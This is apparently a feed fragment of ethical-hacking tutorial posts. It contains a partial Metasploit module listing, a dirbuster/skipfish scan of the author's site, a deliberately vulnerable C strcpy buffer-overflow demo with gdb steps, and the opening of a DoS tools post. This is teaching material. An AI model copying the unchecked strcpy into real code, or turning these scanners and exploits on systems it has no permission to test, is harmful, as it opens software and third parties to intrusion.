   2455  exploit/windows/misc/eiqnetworks_esa                                               2006-07-24       average    No     eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
   2456  exploit/windows/misc/eiqnetworks_esa_topology                                      2006-07-25       average    No     eIQNetworks ESA Topology DELETEDEVICE Overflow
   2457  exploit/linux/antivirus/escan_password_exec                                        2014-04-04       excellent  Yes    eScan Web Management Console Command Injection
   2458  exploit/windows/fileformat/esignal_styletemplate_bof                               2011-09-06       normal     No     eSignal and eSignal Pro File Parsing Buffer Overflow &lt;span class="k"&gt;in &lt;/span&gt;QUO
   2459  exploit/multi/http/extplorer_upload_exec                                           2012-12-31       excellent  Yes    eXtplorer v2.1 Arbitrary File Upload Vulnerability
   2460  exploit/windows/fileformat/ezip_wizard_bof                                         2009-03-09       good       No     eZip Wizard 3.0 Stack Buffer Overflow
   2461  exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection                  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection
   2462  exploit/windows/ftp/freeftpd_user                                                  2005-11-16       average    Yes    freeFTPd 1.0 Username Overflow
   2463  exploit/windows/ftp/freeftpd_pass                                                  2013-08-20       normal     Yes    freeFTPd PASS Command Buffer Overflow
   2464  exploit/windows/fileformat/galan_fileformat_bof                                    2009-12-07       normal     No     gAlan 0.2.1 Buffer Overflow
   2465  exploit/linux/local/glibc_origin_expansion_priv_esc                                2010-10-18       excellent  Yes    glibc &lt;span class="s1"&gt;'$ORIGIN'&lt;/span&gt; Expansion Privilege Escalation
   2466  exploit/linux/local/glibc_realpath_priv_esc                                        2018-01-16       normal     Yes    glibc &lt;span class="s1"&gt;'realpath()'&lt;/span&gt; Privilege Escalation
   2467  exploit/linux/local/glibc_ld_audit_dso_load_priv_esc                               2010-10-18       excellent  Yes    glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation
   2468  exploit/windows/fileformat/iftp_schedule_bof                                       2014-11-06       normal     No     i-FTP Schedule Buffer Overflow
   2469  auxiliary/dos/apple_ios/webkit_backdrop_filter_blur                                2018-09-15       normal     No     iOS Safari Denial of Service with CSS
   2470  exploit/windows/local/ipass_launch_app                                             2015-03-12       excellent  Yes    iPass Mobile Client Service Privilege Escalation
   2471  exploit/aix/local/ibstat_path                                                      2013-09-24       excellent  Yes    ibstat &lt;span class="nv"&gt;$PATH&lt;/span&gt; Privilege Escalation
   2472  exploit/qnx/local/ifwatchd_priv_esc                                                2014-03-10       excellent  Yes    ifwatchd Privilege Escalation
   2473  exploit/windows/browser/lpviewer_url                                               2008-10-06       normal     No     iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
   2474  exploit/linux/local/ktsuss_suid_priv_esc                                           2011-08-13       excellent  Yes    ktsuss suid Privilege Escalation
   2475  exploit/linux/local/lastore_daemon_dbus_priv_esc                                   2016-02-02       excellent  Yes    lastore-daemon D-Bus Privilege Escalation
   2476  auxiliary/scanner/ssh/libssh_auth_bypass                                           2018-10-16       normal     No     libssh Authentication Bypass Scanner
   2477  exploit/windows/browser/mirc_irc_url                                               2003-10-13       normal     No     mIRC IRC URL Buffer Overflow
   2478  exploit/windows/misc/mirc_privmsg_server                                           2008-10-02       normal     No     mIRC PRIVMSG Handling Stack Buffer Overflow
   2479  exploit/osx/browser/osx_gatekeeper_bypass                                          2021-03-25       manual     No     macOS Gatekeeper check bypass
   2480  exploit/osx/local/cfprefsd_race_condition                                          2020-03-18       excellent  Yes    macOS cfprefsd Arbitrary File Write Local Privilege Escalation
   2481  auxiliary/dos/http/marked_redos                                                                     normal     No     marked npm module &lt;span class="s2"&gt;"heading"&lt;/span&gt; ReDoS
   2482  exploit/unix/webapp/mybb_backdoor                                                  2011-10-06       excellent  Yes    myBB 1.6.4 Backdoor Arbitrary Command Execution
   2483  exploit/linux/http/op5_config_exec                                                 2016-04-08       excellent  Yes    op5 v7.1.9 Configuration Command Execution
   2484  exploit/unix/webapp/opensis_chain_exec                                             2020-06-30       excellent  Yes    openSIS Unauthenticated PHP Code Execution
   2485  exploit/unix/webapp/oscommerce_filemanager                                         2009-08-31       excellent  No     osCommerce 2.2 Arbitrary PHP Code Execution
   2486  exploit/multi/http/oscommerce_installer_unauth_code_exec                           2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution
   2487  auxiliary/sniffer/psnuffle                                                                          normal     No     pSnuffle Packet Sniffer
   2488  exploit/unix/http/pfsense_graph_injection_exec                                     2016-04-18       excellent  No     pfSense authenticated graph status RCE
   2489  exploit/unix/http/pfsense_group_member_exec                                        2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   2490  exploit/linux/http/php_imap_open_rce                                               2018-10-23       good       Yes    php imap_open Remote Code Execution
   2491  exploit/unix/webapp/phpbb_highlight                                                2004-11-12       excellent  No     phpBB viewtopic.php Arbitrary Code Execution
   2492  exploit/unix/webapp/phpcollab_upload_exec                                          2017-09-29       excellent  Yes    phpCollab 2.5.1 Unauthenticated File Upload
   2493  exploit/multi/http/phpfilemanager_rce                                              2015-08-28       excellent  Yes    phpFileManager 0.9.8 Remote Code Execution
   2494  exploit/multi/http/phpldapadmin_query_engine                                       2011-10-24       excellent  Yes    phpLDAPadmin query_engine Remote PHP Code Injection
   2495  exploit/multi/http/phpmyadmin_3522_backdoor                                        2012-09-25       normal     No     phpMyAdmin 3.5.2.2 server_sync.php Backdoor
   2496  exploit/multi/http/phpmyadmin_lfi_rce                                              2018-06-19       good       Yes    phpMyAdmin Authenticated Remote Code Execution
   2497  exploit/multi/http/phpmyadmin_null_termination_exec                                2016-06-23       excellent  Yes    phpMyAdmin Authenticated Remote Code Execution
   2498  exploit/multi/http/phpmyadmin_preg_replace                                         2013-04-25       excellent  Yes    phpMyAdmin Authenticated Remote Code Execution via preg_replace&lt;span class="o"&gt;()&lt;/span&gt;
   2499  exploit/multi/http/phpscheduleit_start_date                                        2008-10-01       excellent  Yes    phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
   2500  exploit/linux/local/ptrace_sudo_token_priv_esc                                     2019-03-24       excellent  Yes    ptrace Sudo Token Privilege Escalation
   2501  exploit/multi/http/qdpm_upload_exec                                                2012-06-14       excellent  Yes    qdPM v7 Arbitrary PHP File Upload Vulnerability
   2502  exploit/unix/webapp/rconfig_install_cmd_exec                                       2019-10-28       excellent  Yes    rConfig &lt;span class="nb"&gt;install &lt;/span&gt;Command Execution
   2503  exploit/linux/local/rc_local_persistence                                           1980-10-01       excellent  No     rc.local Persistence
   2504  exploit/unix/http/tnftp_savefile                                                   2014-10-28       excellent  No     tnftp &lt;span class="s2"&gt;"savefile"&lt;/span&gt; Arbitrary Command Execution
   2505  auxiliary/dos/http/ua_parser_js_redos                                                               normal     No     ua-parser-js npm module ReDoS
   2506  exploit/multi/http/v0pcr3w_exec                                                    2013-03-23       great      Yes    v0pCr3w Web Shell Remote Code Execution
   2507  exploit/multi/http/vbseo_proc_deutf                                                2012-01-23       excellent  Yes    vBSEO proc_deutf&lt;span class="o"&gt;()&lt;/span&gt; Remote PHP Code Injection
   2508  auxiliary/gather/vbulletin_getindexablecontent_sqli                                2020-03-12       normal     No     vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection
   2509  exploit/multi/http/vbulletin_getindexablecontent                                   2020-03-12       manual     Yes    vBulletin /ajax/api/content_infraction/getIndexableContent nodeid Parameter SQL Injection
   2510  exploit/multi/http/vbulletin_unserialize                                           2015-11-04       excellent  Yes    vBulletin 5.1.2 Unserialize Code Execution
   2511  exploit/multi/http/vbulletin_widget_template_rce                                   2020-08-09       excellent  Yes    vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
   2512  auxiliary/admin/http/vbulletin_upgrade_admin                                       2013-10-09       normal     No     vBulletin Administrator Account Creation
   2513  auxiliary/gather/vbulletin_vote_sqli                                               2013-03-24       normal     Yes    vBulletin Password Collector via nodeid SQL Injection
   2514  exploit/unix/webapp/vbulletin_vote_sqli_exec                                       2013-03-25       excellent  Yes    vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
   2515  exploit/unix/webapp/php_vbulletin_template                                         2005-02-25       excellent  Yes    vBulletin misc.php Template Name Arbitrary Code Execution
   2516  exploit/multi/http/vbulletin_widgetconfig_rce                                      2019-09-23       excellent  Yes    vBulletin widgetConfig RCE
   2517  exploit/multi/http/vtiger_soap_upload                                              2013-03-26       excellent  Yes    vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload
   2518  exploit/multi/http/vtiger_php_exec                                                 2013-10-30       excellent  Yes    vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
   2519  exploit/multi/misc/w3tw0rk_exec                                                    2015-06-04       excellent  Yes    w3tw0rk / Pitbul IRC Bot  Remote Code Execution
   2520  auxiliary/dos/http/ws_dos                                                                           normal     No     ws - Denial of Service
   2521  exploit/windows/fileformat/xradio_xrl_sehbof                                       2011-02-08       normal     No     xRadio 0.95b Buffer Overflow
   2522  exploit/unix/http/xdebug_unauth_exec                                               2017-09-17       excellent  Yes    xdebug Unauthenticated OS Command Execution


Interact with a module by name or index. For example info 2522, use 2522 or use exploit/unix/http/xdebug_unauth_exec

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Use Owasp dirbuster
&lt;/h2&gt;



&lt;br&gt;
Lauch dirbuster&lt;br&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dirbuster
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm1x0ejs0v5nfwn8j0mtz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm1x0ejs0v5nfwn8j0mtz.png" alt=" " width="771" height="547"&gt;&lt;/a&gt;&lt;br&gt;
complete the information.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwapn0llpubslvtkxgzt8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwapn0llpubslvtkxgzt8.png" alt=" " width="771" height="547"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  exploitation
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywc9wgq8on3c16botw88.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywc9wgq8on3c16botw88.png" alt=" " width="769" height="548"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1khn5hwfij6erj722es5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1khn5hwfij6erj722es5.png" alt=" " width="768" height="544"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3dqnknik6y2hjsikxci.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3dqnknik6y2hjsikxci.png" alt=" " width="800" height="327"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Use skipfish
&lt;/h2&gt;

&lt;p&gt;Launch&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;skipfish &lt;span class="nt"&gt;-o&lt;/span&gt; /home/samglish/Desktop/SamRapport &lt;span class="nt"&gt;-S&lt;/span&gt; /usr/share/skipfish/dictionaries/minimal.wl http://samglishinc.000webhostapp.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35yi5mad7unupxcetng2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35yi5mad7unupxcetng2.png" alt=" " width="800" height="574"&gt;&lt;/a&gt;&lt;br&gt;
Go to SamRapport&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fejet57pjhz43zx26r062.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fejet57pjhz43zx26r062.png" alt=" " width="800" height="403"&gt;&lt;/a&gt;&lt;br&gt;
Open index.html in your browser&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbf13txbuopzrkyamujaq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbf13txbuopzrkyamujaq.png" alt=" " width="800" height="328"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>server</category>
      <category>dirbuster</category>
      <category>vulnerability</category>
      <category>skipfish</category>
    </item>
    <item>
      <title>buffer Overflow (Application Vulnerability)</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Mon, 24 Jun 2024 23:28:31 +0000</pubDate>
      <link>https://forem.com/samglish/buffer-overflow-application-vulnerability-20ic</link>
      <guid>https://forem.com/samglish/buffer-overflow-application-vulnerability-20ic</guid>
      <description>&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/samglish/bufferOverflow/" rel="noopener noreferrer"&gt;https://github.com/samglish/bufferOverflow/&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In french  &lt;code&gt;dépassement de tampon ou débordement de tampon&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;copy data without checking size.&lt;br&gt;
A bug whereby a process, when writing to a buffer, writes outside the space allocated to the buffer, thus overwriting information necessary for the process.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Most common exploitation&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;stack overflow&lt;/li&gt;
&lt;li&gt;Injection of a shellcode on the stack and calculation of its address&lt;/li&gt;
&lt;li&gt;Overflow of a variable on the stack&lt;/li&gt;
&lt;li&gt;Overwriting SEIP with the shellcode address&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzj1gl7tx9zza0k5hy29.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzj1gl7tx9zza0k5hy29.png" alt=" " width="654" height="508"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A C program to demonstrate buffer overflow&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;

       &lt;span class="c1"&gt;// Reserve 5 byte of buffer plus the terminating NULL.&lt;/span&gt;
       &lt;span class="c1"&gt;// should allocate 8 bytes = 2 double words,&lt;/span&gt;
       &lt;span class="c1"&gt;// To overflow, need more than 8 bytes...&lt;/span&gt;
       &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;  &lt;span class="c1"&gt;// If more than 8 characters input&lt;/span&gt;
                        &lt;span class="c1"&gt;// by user, there will be access &lt;/span&gt;
                        &lt;span class="c1"&gt;// violation, segmentation fault&lt;/span&gt;

       &lt;span class="c1"&gt;// a prompt how to execute the program...&lt;/span&gt;
       &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argc&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
              &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"strcpy() NOT executed....&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
              &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Syntax: %s &amp;lt;characters&amp;gt;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
              &lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
       &lt;span class="p"&gt;}&lt;/span&gt;

       &lt;span class="c1"&gt;// copy the user input to mybuffer, without any&lt;/span&gt;
       &lt;span class="c1"&gt;// bound checking a secure version is strcpy_s()&lt;/span&gt;
       &lt;span class="n"&gt;strcpy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
       &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"buffer content= %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

       &lt;span class="c1"&gt;// you may want to try strcpy_s()&lt;/span&gt;
       &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"strcpy() executed...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

       &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Test
&lt;/h2&gt;

&lt;p&gt;Open terminal&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;compile the program
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;gcc -g -o BOF testoverflow.c
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;execute
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;./BOF sam
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;output
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;buffer content= sam
strcpy() executed...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  now enter more than 8 characters.
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;./BOF beididinasamuel
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;buffer content= beididinasamuel
strcpy() executed...
Erreur de segmentation
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  exploit, use GDB in terminal
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$gdb -q ./BOF 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Reading symbols from ./BOF...
(gdb) 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;list the program
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(gdb) list 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1   // A C program to demonstrate buffer overflow
2   #include &amp;lt;stdio.h&amp;gt;
3   #include &amp;lt;string.h&amp;gt;
4   #include &amp;lt;stdlib.h&amp;gt;
5    
6   int main(int argc, char *argv[])
7   {
8    
9          // Reserve 5 byte of buffer plus the terminating NULL.
10         // should allocate 8 bytes = 2 double words,
(gdb) 
11         // To overflow, need more than 8 bytes...
12         char buffer[5];  // If more than 8 characters input
13                          // by user, there will be access 
14                          // violation, segmentation fault
15   
16         // a prompt how to execute the program...
17         if (argc &amp;lt; 2)
18         {
19                printf("strcpy() NOT executed....\n");
20                printf("Syntax: %s &amp;lt;characters&amp;gt;\n", argv[0]);
(gdb) 
21                exit(0);
22         }
23   
24         // copy the user input to mybuffer, without any
25         // bound checking a secure version is strcpy_s()
26         strcpy(buffer, argv[1]);
27         printf("buffer content= %s\n", buffer);
28   
29         // you may want to try strcpy_s()
30         printf("strcpy() executed...\n");
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;breakpoint ( gdb will stop your program just before that function is called)
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(gdb) break 26
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(gdb) break 26
Breakpoint 1 at 0x11ab: file overflow.c, line 26.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;run the program
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(gdb) run AAAAAAAAAAAAAAAA
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Starting program: Directory/BOF AAAAAAAAAAAAAAAA

Breakpoint 1, main (argc=2, argv=0x7fffffffe038) at overflow.c:26
26         strcpy(buffer, argv[1]);
(gdb) 

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;the program stopped at line 26&lt;/p&gt;

&lt;h3&gt;
  
  
  let's analyze the data of the variable
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(gdb) x/s buffer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;0x7fffffffdf3b:"001"
(gdb) 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;for more information on the exploit of content visit click here&lt;br&gt;
&lt;a href="https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/" rel="noopener noreferrer"&gt;&lt;/a&gt;&lt;a href="https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/" rel="noopener noreferrer"&gt;https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>bufferoverflo</category>
      <category>vulnerabilities</category>
      <category>vulnerability</category>
    </item>
    <item>
      <title>Technical Dos attacks</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Mon, 24 Jun 2024 01:07:56 +0000</pubDate>
      <link>https://forem.com/samglish/technical-dos-attacks-2982</link>
      <guid>https://forem.com/samglish/technical-dos-attacks-2982</guid>
      <description>&lt;p&gt;Ethical Hacking - Dos attacks on different services.&lt;br&gt;
&lt;a href="https://github.com/samglish/technicalDos" rel="noopener noreferrer"&gt;https://github.com/samglish/technicalDos&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;The different tools&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Metasploit&lt;/li&gt;
&lt;li&gt;Nmap NSE&lt;/li&gt;
&lt;li&gt;Exploit database&lt;/li&gt;
&lt;li&gt;Scapy&lt;/li&gt;
&lt;/ol&gt;

